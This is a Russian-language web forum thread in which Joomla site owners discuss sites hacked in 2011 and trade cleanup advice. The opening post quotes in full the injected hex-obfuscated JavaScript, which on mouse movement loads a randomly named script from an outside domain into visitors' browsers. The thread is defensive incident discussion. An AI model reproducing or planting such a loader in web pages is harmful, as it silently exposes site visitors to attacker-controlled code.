0 Пользователей и 1 Гость просматривают эту тему.
  • 14 Ответов
  • 4249 Просмотров
*

grishin

  • Захожу иногда
  • 145
  • 0 / 0
Сегодня обнаружил что все три сайта которые были у меня на одном хостинге были взломаны.

Ошибка которую выдавали сайты была вот такая
Parse error: syntax error, unexpected '<' in /home/www/.../index.php on line 89

ВСЕ файлы index.* и некоторые другие были испорченны в данное время 02.06.2011 2:18 ! В конец файлов был дописан скрипт
Код
<script type="text/javascript">
var _0x5cb4=["\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x69\x6E\x75\x78\x73\x74\x61\x62\x73\x2E\x63\x6F\x6D\x2F","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x2E\x6A\x73","\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];(function (){var _0x8dacx1=_0x5cb4[0]+Math[_0x5cb4[2]]().toString()[_0x5cb4[1]](3)+_0x5cb4[3];var _0x8dacx2=0;document[_0x5cb4[4]]=function (){if(_0x8dacx2===0){_0x8dacx2=1;var _0x8dacx3=document[_0x5cb4[6]](_0x5cb4[5])[0];var _0x8dacx4=document[_0x5cb4[8]](_0x5cb4[7]);_0x8dacx4[_0x5cb4[9]]=_0x5cb4[10];_0x8dacx4[_0x5cb4[11]]=function (){if(this[_0x5cb4[12]]==_0x5cb4[13]){_0x8dacx2=2;} ;} ;_0x8dacx4[_0x5cb4[14]]=function (){_0x8dacx2=2;} ;_0x8dacx4[_0x5cb4[15]]=_0x8dacx1;_0x8dacx3[_0x5cb4[16]](_0x8dacx4);} ;} ;} )();
</script>
Написал хостеру об этой проблеме, в ответ получил следующее
Цитировать
Данная проблема, вероятнее всего, возникла в виду того, что был произведен несанкционированный доступ к используемой Вами CMS (Joomla), ввиду чего через уязвимость данной CMS был внедрен вредоносный код вида:
В данной ситуации мы рекомендуем Вам восстановить сайты из резервных копий за дату, когда сайты еще работали
Из резервной копии восстановился и все заработало...

Помогите разобраться с этой проблемой. Что это вообще было?
Как в дальнейшем избежать данного взлома?
Что делал данный скрипт?
*

skai

  • Завсегдатай
  • 1198
  • 153 / 1
  • skaiseo
Что делает скрипт не знаю.
По поводу защиты ответ стандартный: - не сохраняй пароли ftp, проверь комп на вирусы.
Наполнение вашего сайта - 1т.р. стр. (текст, изображения, мета, перелинковка). Гарантия высокого ранжирования. SEO консультация в подарок.
----------------------------------------------------------------------------------------------
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
через уязвимость данной CMS был внедрен вредоносный код

Может и так. Проверьте свой ПК AVPTool. Смените пароли от ftp, не храните их в менеджерах паролей. Восстановите сайт из бекапа и проверьте бекап той же AVPTool. Обновите все на сайте.

Могли бы сайт показать.
« Последнее редактирование: 02.06.2011, 12:32:26 от wishlight »
*

grishin

  • Захожу иногда
  • 145
  • 0 / 0
wishlight обычный сайт...всё что было странного написал в первом посте...до того как создал тему из бекапа все восстановил..
*

mohax

  • Давно я тут
  • 901
  • 66 / 3
Поверить версии компонентов, самой Joomla. Если нужно - все обновить.
*

ploskopopik

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
У меня вчера случилась точно такая же проблема, один в один. Но дело в том, что у меня нет резервной копии, как я могу восстановить работоспособность сайта?удалила вредоносный код из index, он появился в другом файле. Видимо есть какой то вирус, который генерит этот код.Как его найти?Подскажите пожалуйста.
*

grishin

  • Захожу иногда
  • 145
  • 0 / 0
Удаляйте код их тех файлов которые показывает сайт...что бы сайт заработал я файлов 15 почистил по очереди...
Скачайте весь сайт себе на компьютер и пройдитесь поиском и заменой по всем файлам...наверное Total Commander справиться, сам не пробовал.
Где то видел скрипт, который запускаешь и он удаляет на сервере то что ты указываешь в нем...очень удобный..

Какая версия движка у вас?
Хостер не делает резервные копии?
*

grishin

  • Захожу иногда
  • 145
  • 0 / 0
*

ploskopopik

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
нет, хостер ответил мол смените пароль на ftp и ищите ищите, версия 1.5.22
*

grishin

  • Захожу иногда
  • 145
  • 0 / 0
Ну тогда поиск и замена вас спасет...ссылку на БЕСПЛАТНУЮ програмку я вам дал, правда она из под виндуса только работает..придётся весь сайт скачать...

Наверное сто раз слышали что нужно делать резервную копию периодически? ;)
*

ploskopopik

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
слыхать то конечно слышали, но как говорится пока не коснется думаешь нормально все, а вот когда припрет, то да. Мой косяк сама знаю, вот сижу и локти теперь кусаю))
*

ploskopopik

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Спасибо за ссылочку, будем искать. Не прощаюсь))
*

grishin

  • Захожу иногда
  • 145
  • 0 / 0
Ну собственно ничего хорошего(( вчера вечером с одним из трех сайтов произошло повторное встраивание вредоносного скрипта....возникают вопросы:

Почему это произошло только с одним сайтом?
Что этот скрипт делает? и какие последствия.
*

mohax

  • Давно я тут
  • 901
  • 66 / 3
Ну собственно ничего хорошего(( вчера вечером с одним из трех сайтов произошло повторное встраивание вредоносного скрипта....возникают вопросы:

Почему это произошло только с одним сайтом?
Что этот скрипт делает? и какие последствия.
Какие работы были сделаны из тех, что советовались выше?
*

Gruz

  • Завсегдатай
  • 1275
  • 167 / 3
  • gruz@jabber.org | gruz.org.ua
Я бы рекомендовал поставить копию инфицированного сайта на локалхост.
Поставить рядом чистую Joomla. установить все точно такие же расширения. Настраивать не нужно, только установить.
Потом на инфицированной папка за папкой удалять и заменять на чистые.
Исключения - папка с изображениями и шаблоном. Там надо посмотреть и руками поправить. Их удалять нельзя, конечно же.

Вирус может быть как в файлах Joomla, так и лежать где-то спец.файл для доступа, задние двери. Потом перезапись сверху чистыми файлами проблему не решит.
Життя має дві форми - горіння і гниття!
-
Со мной на "ты" - Вам лень развёрнуто формулировать вопрос? Нам лень отвечать. Правильный вопрос: - Версии J! и проблемного расширения? - Что хотел? - Что пробовал? - Что получилось и что не получилось? - Какие были ошибки?
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 3155
Последний ответ 31.03.2024, 16:14:32
от SeBun
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 71316
Последний ответ 30.08.2023, 12:53:33
от SeBun
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

Ответов: 9
Просмотров: 2263
Последний ответ 05.11.2021, 21:47:31
от wishlight
В файле index.php постоянно появляется вредоносный код

Автор Armal

Ответов: 29
Просмотров: 4474
Последний ответ 08.05.2021, 16:16:32
от gartes
Взломали сайт. Как в некоторых случаях делаю я

Автор cntrl

Ответов: 0
Просмотров: 1139
Последний ответ 29.08.2020, 00:25:24
от cntrl